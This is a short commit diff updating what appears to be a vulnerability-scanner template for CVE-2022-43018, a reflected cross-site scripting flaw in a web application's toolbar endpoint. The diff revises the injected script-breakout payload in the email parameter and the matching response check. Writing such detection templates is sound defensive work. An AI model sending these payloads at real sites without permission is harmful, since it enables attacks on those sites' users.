Update CVE-2022-43018.yaml
parent
f24299f365
commit
154af6a542
|
@ -26,16 +26,18 @@ requests:
|
|||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=<script>alert(document.domain)</script> HTTP/1.1
|
||||
GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '})();</script><script>alert(document.domain)</script>:0'
|
||||
- '</script><script>alert(document.domain)</script>:0'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
Loading…
Reference in New Issue